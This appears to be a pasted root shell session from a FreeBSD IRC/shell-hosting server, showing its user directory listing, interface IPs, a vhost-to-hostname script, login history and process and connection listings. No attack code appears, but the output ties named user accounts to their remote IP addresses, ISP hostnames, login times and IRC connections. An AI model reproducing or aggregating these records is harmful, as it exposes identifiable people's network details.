drwxr-xr-x    3 sqd          sqd           512 Dec  4  2006 digital/
drwxr-xr-x    8 digitalman   digitalman    512 May 20 14:26 digitalman/
drwxr-xr-x    5 1176         1176          512 Jan 16  2007 dizzle/
drwxr-xr-x    3 djkarl       djkarl        512 Jan 10 12:23 djkarl/
drwxr-xr-x    2 djspark      djspark       512 Jun 24  2008 djspark/
drwxr-xr-x    7 chrirc       chrirc        512 Jan  6  2007 doomed/
drwxr-xr-x    8 dravas       dravas       1024 Sep 29  2007 dravas/
drwxr-xr-x    2 dv327        dv327         512 Apr  8  2007 drk9/
drwxr-xr-x    5 1259         1259          512 Apr 11  2007 dust/
drwxr-xr-x    3 dv327        dv327         512 Aug  9  2008 dv327/
drwxr-xr-x    8 edgein       edgein        512 Feb 13  2008 edgein/
drwxr-xr-x    8 en0prcv      en0prcv       512 Apr 14  2007 en0prcv/
drwxr-xr-x    4 evino        evino         512 Jan 18  2006 evino/
drwxr-xr-x    7 blkgraz      blkgraz       512 Mar  1  2005 evino2k5/
drwxr-xr-x    4 root         wheel         512 Apr 12  2007 execute/
drwxr-xr-x    3 f3d0r        f3d0r         512 Jul 31  2007 f3d0r/
drwxr-xr-x    2 feed         feed          512 Aug 21  2008 feed/
drwxr-xr-x    4 genosyde     genosyde      512 Jan 27 18:18 genosyde/
drwxr-xr-x    2 grindey      grindey       512 Mar 25  2008 grindey/
drwxr-xr-x    2 groove       groove        512 Apr 12  2007 groove/
drwxr-xr-x    5 grumpy       grumpy        512 Feb  4 18:06 grumpy/
drwxr-xr-x    4 hh360        hh360         512 May 19  2008 hh360/
drwxr-xr-x    2 hixk         hixk          512 Nov 24  2008 hixk/
drwxr-xr-x    3 howell1      howell1       512 May 29 20:39 howell1/
drwxr-xr-x   12 hts          hts          1024 Jun 20 20:58 hts/
drwxr-xr-x    2 hw4tbnc      hw4tbnc       512 May 11  2008 hw4tbnc/
drwxr-xr-x    4 ioplex       ioplex        512 May  8 20:16 ioplex/
drwxr-xr-x    6 ircjaymz     ircjaymz      512 Mar 18  2008 ircjaymz/
drwxr-xr-x    2 ircusr       ircusr        512 Jan 20 17:49 ircusr/
drwxr-xr-x    2 itzkorn      itzkorn       512 Apr 12  2007 itzkorn/
drwxr-xr-x    2 izedd        izedd         512 Oct  9  2007 izedd/
drwxr-xr-x    2 jaiven       jaiven        512 Feb 16 17:08 jaiven/
drwxr-xr-x    4 jamesn       jamesn        512 May 31  2007 jamesn/
drwxr-xr-x    8 jax66        jax66        1024 May 14 16:03 jax66/
drwxr-xr-x    2 jerryste     jerryste      512 Dec 28 14:19 jerryste/
-rw-r--r--    1 root         wheel           0 Oct  5  2007 jj.log
drwxr-xr-x    2 jschultk     jschultk      512 May 31  2007 jschultk/
drwxr-xr-x    2 jtracy       jtracy        512 Dec  3  2008 jtracy/
drwxr-xr-x    2 katsst       katsst        512 Apr 12  2007 katsst/
drwxr-xr-x   15 khicks       khicks       1024 Jan  2  2008 khicks/
drwxr-xr-x    2 kingzy       kingzy        512 Feb 22 16:50 kingzy/
drwxr-xr-x    4 kokoryu      kokoryu       512 Feb  1 16:54 kokoryu/
drwxr-xr-x    2 kooner       kooner        512 Mar 24 17:34 kooner/
drwxr-xr-x    2 kruapra      kruapra       512 Jan  1  2008 kruapra/
drwxr-xr-x    2 ksafusi      ksafusi       512 Jan 29  2008 ksafusi/
drwxr-xr-x    2 l33t         l33t          512 Apr 12  2007 l33t/
drwxr-xr-x    2 lailoke      lailoke       512 Mar 11 22:12 lailoke/
drwxr-xr-x    9 lordy        lordy         512 May 17 04:05 lordy/
drwxr-xr-x    8 ltootle      ltootle       512 Jun 10  2008 ltootle/
drwxr-xr-x   15 lyhne1       lyhne1       1024 May 25 23:00 lyhne1/
drwxr-xr-x    6 lymelyte     lymelyte      512 Mar 29 14:18 lymelyte/
drwxr-xr-x    3 lynx         lynx          512 May 28  2008 lynx/
drwxr-xr-x    2 mae21        mae21         512 Mar  8 21:02 mae21/
drwxr-xr-x    5 manboo       manboo        512 Jul  7  2008 manboo/
drwxr-xr-x    3 matt         matt          512 Jun 20 19:25 matt/
drwxr-xr-x    2 methanl      methanl       512 Feb  5  2008 methanl/
drwxr-xr-x    6 mimik0r      mimik0r       512 May 20  2008 mimik0r/
drwxr-xr-x    2 mindben      mindben       512 Nov 24  2008 mindben/
drwxr-xr-x    7 mlh          mlh           512 Apr  8 01:12 mlh/
drwxr-xr-x    3 mogle3       mogle3        512 Apr  8 12:06 mogle3/
drwxr-xr-x    3 mooo         mooo          512 May 21 20:50 mooo/
drwxr-xr-x    5 mrts         mrts          512 Mar 18 01:51 mrts/
drwxr-xr-x    9 narcissu     narcissu      512 Feb  2  2008 narcissu/
drwxr-xr-x    7 nardi        nardi         512 Mar 24 10:55 nardi/
drwxr-xr-x    3 nek0o        nek0o         512 Jul 21  2008 nek0o/
drwxr-xr-x    3 neohax       neohax        512 Jun 13  2007 neohax/
drwxr-xr-x    3 nexxtea      nexxtea       512 Apr 19  2007 nexxtea/
drwxr-xr-x    9 nodex        nodex         512 Sep  5  2007 nodex/
drwxr-xr-x    2 nsc          wheel         512 Apr 12  2007 nsc/
drwxr-xr-x    3 nyakz        nyakz         512 Mar 13 20:13 nyakz/
drwxr-xr-x    9 oby1         oby1          512 Feb 13  2008 oby1/
drwxr-xr-x   21 omelette     omelette     1024 Jun  1  2008 omelette/
drwxr-xr-x    2 omen         omen          512 Nov 24  2008 omen/
drwxr-xr-x    5 omgwtf       omgwtf        512 Apr 27 03:17 omgwtf/
drwxr-xr-x    5 owine        owine         512 Apr 21  2008 owine/
drwxr-xr-x    6 own3d        own3d         512 Oct 15  2008 own3d/
drwxr-xr-x    5 paleride     paleride      512 Jan 27 17:55 paleride/
drwxr-xr-x    2 pbx          pbx           512 Dec 28 14:22 pbx/
drwxr-xr-x    2 percott1     percott1      512 Jun 24  2008 percott1/
drwxr-xr-x    8 pimpinjg     pimpinjg      512 Jun 23 07:20 pimpinjg/
drwxr-xr-x    4 poolboy      poolboy       512 Aug 29  2007 poolboy/
drwxr-xr-x    3 prodigy      prodigy       512 May 30  2008 prodigy/
drwxr-xr-x    3 psycoz       psycoz        512 Jun  7 17:01 psycoz/
drwxr-xr-x    2 qberto       qberto        512 Mar 17 12:09 qberto/
drwxr-xr-x    7 qfx          qfx           512 Feb 17 04:54 qfx/
drwxr-xr-x    4 quinn        quinn         512 Aug 10  2007 quinn/
drwxr-xr-x    5 reaper90     reaper90      512 Dec  2  2007 reaper90/
drwxr-xr-x   22 redrum       redrum       1024 Jun  9 12:49 redrum/
drwxr-xr-x    5 reznik       reznik        512 Apr 11  2008 reznik/
drwxr-xr-x    4 rice21       rice21        512 Dec 17  2008 rice21/
drwxr-xr-x    4 rikt         rikt          512 Feb 17 06:27 rikt/
drwxr-xr-x    5 romeo        romeo         512 Jun 20 02:58 romeo/ 
drwxr-xr-x    7 roodyk       roodyk        512 Apr 26 14:04 roodyk/
drwxr-xr-x    3 sacred       sacred        512 Jun  1  2007 sacred/
drwxr-xr-x    3 safety       safety        512 Feb 15  2008 safety/
drwxr-xr-x    2 sakik1       sakik1        512 Dec  3  2008 sakik1/
drwxr-xr-x    2 sal          sal           512 Feb 16 17:17 sal/
drwxr-xr-x    5 schlomer     schlomer      512 Aug 24  2007 schlomer/
drwxr-xr-x    7 scouse       scouse       1536 Nov  5  2008 scouse/
drwxr-xr-x    5 sharpie      sharpie       512 Apr 13  2007 sharpie/
drwxr-xr-x    5 shoes        shoes         512 Mar  7 22:32 shoes/
drwxr-xr-x    2 silver15     silver15      512 Mar 25  2008 silver15/
drwxr-xr-x    3 simonbh      simonbh       512 Aug  9  2007 simonbh/
drwxr-xr-x    9 sinistro     sinistro      512 Oct  5  2007 sinistro/
drwxr-xr-x    2 skit         skit          512 Apr 12  2007 skit/
drwxr-xr-x    6 skypilot     skypilot      512 Nov  7  2008 skypilot/
drwxr-xr-x    5 smash        smash         512 Jun 22 01:29 smash/
drwxr-xr-x    6 sqd          sqd           512 May  7 20:56 sqd/
drwxr-xr-x    3 ssaws        ssaws         512 Feb  3 23:20 ssaws/
drwxr-xr-x    4 ste          ste           512 Jun 15 12:29 ste/
drwxr-xr-x    5 subkult      subkult       512 Feb  3 11:59 subkult/
drwxr-xr-x    7 sysc         sysc          512 Jun 11 10:27 sysc/
drwxr-xr-x    9 tarawa       tarawa        512 May 26 10:51 tarawa/
drwxr-xr-x    3 tea          tea           512 Mar 16  2008 tea/
drwxr-xr-x    5 techi3       techi3        512 Aug 29  2007 techi3/
drwxr-xr-x    5 timgor       timgor       1024 Sep  3  2007 timgor/
drwxr-xr-x    3 tlm          tlm           512 May  1  2007 tlm/
drwxr-xr-x    7 vamp         vamp         1024 Nov 20  2007 vamp/
drwxr-xr-x    2 vietnigh     vietnigh      512 Mar  8 15:31 vietnigh/
drwxr-xr-x    3 visage       visage        512 Mar 13 15:59 visage/
drwxr-xr-x    4 vitalrbj     vitalrbj      512 May 15  2007 vitalrbj/
drwxr-xr-x    3 vividbreeze  vividbreeze   512 May 15  2005 vividbreeze/
drwxr-xr-x    2 voxitize     voxitize      512 Aug 18  2008 voxitize/
drwxr-xr-x    5 warlordz     warlordz      512 Aug 20  2007 warlordz/
drwxr-xr-x    3 wchan21      wchan21       512 Dec 15  2008 wchan21/
drwxr-xr-x    4 wolf         wolf          512 Aug 28  2008 wolf/
drwxr-xr-x    2 xavi         xavi          512 Feb  1 16:56 xavi/
drwxr-xr-x    3 xckx         xckx          512 Oct  4  2007 xckx/
drwxr-xr-x    4 xkelsx       xkelsx        512 Dec 16  2008 xkelsx/
drwxr-xr-x    5 y2j          y2j           512 May 15 08:42 y2j/
drwxr-xr-x   13 yaquis       yaquis       1024 Jun 11 14:32 yaquis/
drwxr-xr-x    8 zeepysea     zeepysea      512 Oct 21  2008 zeepysea/
drwxr-xr-x    6 zenchi       zenchi        512 Nov 29  2007 zenchi/
drwxr-xr-x    4 zime         zime          512 Feb 15  2008 zime/
drwxr-xr-x    3 zoo          zoo           512 Apr 14  2007 zoo/
[root@velocity:/home]# 


[root@velocity:/home]# ifconfig
bge0: flags=8843 mtu 1500
        options=1b
        inet 72.20.3.98 netmask 0xfffffffc broadcast 72.20.3.99
        inet 72.20.28.193 netmask 0xffffffff broadcast 72.20.28.193
        inet 72.20.28.194 netmask 0xffffffff broadcast 72.20.28.194
        inet 72.20.28.195 netmask 0xffffffff broadcast 72.20.28.195
        inet 72.20.28.196 netmask 0xffffffff broadcast 72.20.28.196
        inet 72.20.28.197 netmask 0xffffffff broadcast 72.20.28.197
        inet 72.20.28.198 netmask 0xffffffff broadcast 72.20.28.198
        inet 72.20.28.199 netmask 0xffffffff broadcast 72.20.28.199
        inet 72.20.28.200 netmask 0xffffffff broadcast 72.20.28.200
        inet 72.20.28.201 netmask 0xffffffff broadcast 72.20.28.201
        inet 72.20.28.202 netmask 0xffffffff broadcast 72.20.28.202
        inet 72.20.28.203 netmask 0xffffffff broadcast 72.20.28.203
        inet 72.20.28.204 netmask 0xffffffff broadcast 72.20.28.204
        inet 72.20.28.205 netmask 0xffffffff broadcast 72.20.28.205
        inet 72.20.28.206 netmask 0xffffffff broadcast 72.20.28.206
        inet 72.20.28.207 netmask 0xffffffff broadcast 72.20.28.207
        inet 72.20.28.208 netmask 0xffffffff broadcast 72.20.28.208
        inet 72.20.28.209 netmask 0xffffffff broadcast 72.20.28.209
        inet 72.20.28.210 netmask 0xffffffff broadcast 72.20.28.210
        inet 72.20.28.211 netmask 0xffffffff broadcast 72.20.28.211
        inet 72.20.28.212 netmask 0xffffffff broadcast 72.20.28.212
        inet 72.20.28.213 netmask 0xffffffff broadcast 72.20.28.213
        inet 72.20.28.214 netmask 0xffffffff broadcast 72.20.28.214
        inet 72.20.28.215 netmask 0xffffffff broadcast 72.20.28.215
        inet 72.20.28.216 netmask 0xffffffff broadcast 72.20.28.216
        inet 72.20.28.217 netmask 0xffffffff broadcast 72.20.28.217
        inet 72.20.28.218 netmask 0xffffffff broadcast 72.20.28.218
        inet 72.20.28.219 netmask 0xffffffff broadcast 72.20.28.219
        inet 72.20.28.220 netmask 0xffffffff broadcast 72.20.28.220
        inet 72.20.28.221 netmask 0xffffffff broadcast 72.20.28.221
        inet 72.20.28.222 netmask 0xffffffff broadcast 72.20.28.222
        inet 72.20.28.223 netmask 0xffffffff broadcast 72.20.28.223
        inet 72.20.28.224 netmask 0xffffffff broadcast 72.20.28.224
        inet 72.20.28.225 netmask 0xffffffff broadcast 72.20.28.225
        inet 72.20.28.226 netmask 0xffffffff broadcast 72.20.28.226
        inet 72.20.28.227 netmask 0xffffffff broadcast 72.20.28.227
        inet 72.20.28.228 netmask 0xffffffff broadcast 72.20.28.228
        inet 72.20.28.229 netmask 0xffffffff broadcast 72.20.28.229
        inet 72.20.28.230 netmask 0xffffffff broadcast 72.20.28.230
        inet 72.20.28.231 netmask 0xffffffff broadcast 72.20.28.231
        inet 72.20.28.232 netmask 0xffffffff broadcast 72.20.28.232
        inet 72.20.28.233 netmask 0xffffffff broadcast 72.20.28.233
        inet 72.20.28.234 netmask 0xffffffff broadcast 72.20.28.234
        inet 72.20.28.235 netmask 0xffffffff broadcast 72.20.28.235
        inet 72.20.28.236 netmask 0xffffffff broadcast 72.20.28.236
        inet 72.20.28.237 netmask 0xffffffff broadcast 72.20.28.237
        inet 72.20.28.238 netmask 0xffffffff broadcast 72.20.28.238
        inet 72.20.28.239 netmask 0xffffffff broadcast 72.20.28.239
        inet 72.20.28.240 netmask 0xffffffff broadcast 72.20.28.240
        inet 72.20.28.241 netmask 0xffffffff broadcast 72.20.28.241
        inet 72.20.28.242 netmask 0xffffffff broadcast 72.20.28.242
        inet 72.20.28.243 netmask 0xffffffff broadcast 72.20.28.243
        inet 72.20.28.244 netmask 0xffffffff broadcast 72.20.28.244
        inet 72.20.28.245 netmask 0xffffffff broadcast 72.20.28.245
        inet 72.20.28.246 netmask 0xffffffff broadcast 72.20.28.246
        inet 72.20.28.247 netmask 0xffffffff broadcast 72.20.28.247
        inet 72.20.28.248 netmask 0xffffffff broadcast 72.20.28.248
        inet 72.20.28.249 netmask 0xffffffff broadcast 72.20.28.249
        inet 72.20.28.250 netmask 0xffffffff broadcast 72.20.28.250
        inet 72.20.28.251 netmask 0xffffffff broadcast 72.20.28.251
        inet 72.20.28.252 netmask 0xffffffff broadcast 72.20.28.252
        inet 72.20.28.253 netmask 0xffffffff broadcast 72.20.28.253
        inet 72.20.28.254 netmask 0xffffffff broadcast 72.20.28.254
        ether 00:11:11:cc:09:63
        media: Ethernet 10baseT/UTP 
        status: active
lo0: flags=8049 mtu 16384
        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 
        inet6 ::1 prefixlen 128 
        inet 127.0.0.1 netmask 0xff000000 
[root@velocity:/home]# 


[root@velocity:/usr/home]# cat /bin/vhosts 
#!/usr/local/bin/bash
echo "

          _   __/ /_  ____  _____/ /______
         | | / / __ \/ __ \/ ___/ __/ ___/
         | |/ / / / / /_/ (__  ) /_(__  )
         |___/_/ /_/\____/____/\__/____/
           www.vitalspeeds.com/vhosts

72.20.3.98 -\> .
72.20.28.193 -\> scaring.us.
72.20.28.194 -\> .
72.20.28.195 -\> George.W.Bush.is.scaring.us.
72.20.28.196 -\> l33t.hax0rs.are.scaring.us.
72.20.28.197 -\> your.mom.is.scaring.us.
72.20.28.198 -\> irc.isidling.net.
72.20.28.199 -\> everyone.isalways.idling.net.
72.20.28.200 -\> just.idling.net.
72.20.28.201 -\> the.mpaa.keeps.scaring.us.
72.20.28.202 -\> the.riaa.keeps.scaring.us.
72.20.28.203 -\> defaultxbe.com.
72.20.28.204 -\> ownage.net.
72.20.28.205 -\> absolute.ownage.net.
72.20.28.206 -\> complete.ownage.net.
72.20.28.207 -\> is.the.godofgods.net.
72.20.28.208 -\> fatblunts.com.
72.20.28.209 -\> will.work.for.fatblunts.com.
72.20.28.210 -\> smokes.fatblunts.com.
72.20.28.211 -\> rolls.fatblunts.com.
72.20.28.212 -\> fuckdapolice.com.
72.20.28.213 -\> killed.my.wife.and.said.fuckdapolice.com.
72.20.28.214 -\> owned.nasa.and.said.fuckdapolice.com.
72.20.28.215 -\> playah.org.
72.20.28.216 -\> big.time.playah.org.
72.20.28.217 -\> still.a.playah.org.
72.20.28.218 -\> the.original.playah.org.
72.20.28.219 -\> shitsngiggles.net.
72.20.28.220 -\> packeted.gov.for.shitsngiggles.net.
72.20.28.221 -\> us-govt.info.
72.20.28.222 -\> has.topsecret.us-govt.info.
72.20.28.223 -\> steals.us-govt.info.
72.20.28.224 -\> packets.the.us-govt.info.
72.20.28.225 -\> oblivion.globalwar.net.
72.20.28.226 -\> started.a.globalwar.net.
72.20.28.227 -\> irc.sith-net.com.
72.20.28.228 -\> i.am.away.idling.net.
72.20.28.229 -\> you.got.schooled.org.
72.20.28.230 -\> wonders.why.arabs.like.to.fuck.withthe.us.
72.20.28.231 -\> dont.fuck.withthe.us.
72.20.28.232 -\> stole.your-ip.info.
72.20.28.233 -\> has.your-ip.info.
72.20.28.234 -\> overflo.ws.
72.20.28.235 -\> your.mom.needs.a.tampon.before.she.overflo.ws.
72.20.28.236 -\> buffer.overflo.ws.
72.20.28.237 -\> got.hacked.by.buffer.overflo.ws.
72.20.28.238 -\> the.toilet.overflo.ws.
72.20.28.239 -\> i.made.the.hoover.dam.overflo.ws.
72.20.28.240 -\> i.am.teh.antidr.ug.
72.20.28.241 -\> irc.cheazey.net.
72.20.28.242 -\> staff.vitalspeeds.com.
72.20.28.243 -\> oper.idlenetworks.net.
72.20.28.244 -\> .
72.20.28.245 -\> .
72.20.28.246 -\> .
72.20.28.247 -\> .
72.20.28.248 -\> .
72.20.28.249 -\> .
72.20.28.250 -\> .
72.20.28.251 -\> .
72.20.28.252 -\> .
72.20.28.253 -\> cyberia.is.scaring.us.
72.20.28.254 -\> anarchy.fuckdapolice.com.
"


[root@velocity:~]# last root

wtmp begins Mon Jun  1 06:20:11 CDT 2009
[root@velocity:~]# last romeo
romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00)

wtmp begins Mon Jun  1 06:20:11 CDT 2009
[root@velocity:~]# last pimpinjg
pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 07:29 - 07:51  (00:22)
pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 05:47 - 06:44  (00:56)
pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:41 - 05:46  (00:05)
pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:40 - 05:41  (00:00)
pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 05:30 - 05:41  (00:10)
pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 04:32 - 04:35  (00:02)
pimpinjg         ttyp3    cpe-76-175-20-18 Tue Jun 23 20:54 - 20:54  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:47 - 20:53  (12:06)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42  (00:05)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43  (00:06)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32  (01:12)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36  (01:20)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12  (00:00)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10  (02:10)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25  (00:42)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59  (00:07)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43  (00:28)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14  (00:02)
pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07  (00:04)
pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14  (00:28)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05  (00:50)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14  (00:07)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54  (00:31)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24  (00:43)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37  (00:24)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19  (00:33)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40  (00:02)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49  (00:19)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26  (00:05)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12  (00:08)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03  (00:02)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00  (00:04)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55  (00:11)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12  (00:03)
pimpinjg         ttypf    cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48  (00:50)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51  (00:16)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23  (00:16)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53  (00:01)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25  (00:03)
pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08  (00:06)
pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29  (00:10)
pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14  (00:00)
pimpinjg         ttypd    76.175.20.182    Fri Jun 19 20:41 - 20:43  (00:01)
pimpinjg         ttypf    cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57  (00:04)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12  (00:01)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07  (00:14)
pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42  (00:00)
pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41  (00:12)
pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44  (00:41)
pimpinjg         ttypd    cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52  (00:42)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37  (00:06)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29  (00:01)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26  (00:00)
pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25  (00:01)

wtmp begins Mon Jun  1 06:20:11 CDT 2009
[root@velocity:~]# 

[root@velocity:~]# ps -aux | grep romeo
root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.16 sshd: romeo [priv] (sshd)
romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:01.47 sshd:  (sshd)
romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
romeo      51241  0.0  0.6  9296  6136  p0  S+   11:50PM   0:10.95 irssi -h absolute.ownage.net
romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.04 -bash (bash)
romeo      62761  0.0  0.1  2040  1448  p2  S+    4:25AM   0:00.04 screen -r

[root@velocity:~]# lsof -i -n | grep romeo
irssi     51241      romeo    3u  IPv4 0xca130740      0t0  TCP 72.20.28.205:61626->71.6.199.68:ircd (ESTABLISHED)
irssi     51241      romeo    4u  IPv4 0xc58c4740      0t0  TCP 72.20.28.205:53292->66.225.223.70:ircd (ESTABLISHED)
irssi     51241      romeo    7u  IPv4 0xca04a1d0      0t0  TCP 72.20.28.205:62094->94.102.58.212:ircd (ESTABLISHED)
sshd      60584      romeo    3u  IPv4 0xc9e971d0      0t0  TCP 72.20.28.248:ssh->188.49.23.137:28098 (ESTABLISHED)
[root@velocity:~]# 

root@velocity:/var/run]# ps -auxwww
USER         PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
root          10 83.0  0.0     0     8  ??  RL   27Jan08 534762:26.98 [idle]
lyhne1     85085 11.3  0.3 10700  3096  ??  S    11May09 1274:26.14 /home/lyhne1/services/services
root           0  0.0  0.0     0     0  ??  WLs  27Jan08   0:00.08 [swapper]
root           1  0.0  0.0   772    80  ??  ILs  27Jan08  21:20.52 /sbin/init --
root           2  0.0  0.0     0     8  ??  DL   27Jan08  38:47.98 [g_event]
root           3  0.0  0.0     0     8  ??  DL   27Jan08 187:53.55 [g_up]
root           4  0.0  0.0     0     8  ??  DL   27Jan08 141:20.71 [g_down]
root           5  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [kqueue taskq]
root           6  0.0  0.0     0     8  ??  DL   27Jan08   0:00.01 [thread taskq]
root           7  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_0]
root           8  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_1]
root           9  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_2]
root          11  0.0  0.0     0     8  ??  WL   27Jan08 3371:26.93 [swi4: clock sio]
root          12  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi3: vm]
root          13  0.0  0.0     0     8  ??  WL   27Jan08 6365:16.77 [swi1: net]
root          14  0.0  0.0     0     8  ??  DL   27Jan08 557:44.26 [yarrow]
root          15  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi6: task queue]
root          16  0.0  0.0     0     8  ??  WL   27Jan08   0:00.01 [swi6: Giant taskq]
root          17  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi5: +]
root          18  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi2: cambio]
root          19  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq9: acpi0]
root          20  0.0  0.0     0     8  ??  WL   27Jan08 5058:47.37 [irq16: bge0]
root          21  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq21: uhci0 ehci0]
root          22  0.0  0.0     0     8  ??  DL   27Jan08   0:02.22 [usb0]
root          23  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [usbtask]
root          24  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq22: uhci1]
root          25  0.0  0.0     0     8  ??  DL   27Jan08   0:02.68 [usb1]
root          26  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq18: uhci2]
root          27  0.0  0.0     0     8  ??  DL   27Jan08   0:01.99 [usb2]
root          28  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq23: uhci3]
root          29  0.0  0.0     0     8  ??  DL   27Jan08   0:02.09 [usb3]
root          30  0.0  0.0     0     8  ??  DL   27Jan08   0:02.34 [usb4]
root          31  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq14: ata0]
root          32  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq15: ata1]
root          33  0.0  0.0     0     8  ??  WL   27Jan08 149:12.28 [irq20: atapci1]
root          34  0.0  0.0     0     8  ??  WL   27Jan08   0:00.60 [irq1: atkbd0]
root          35  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi0: sio]
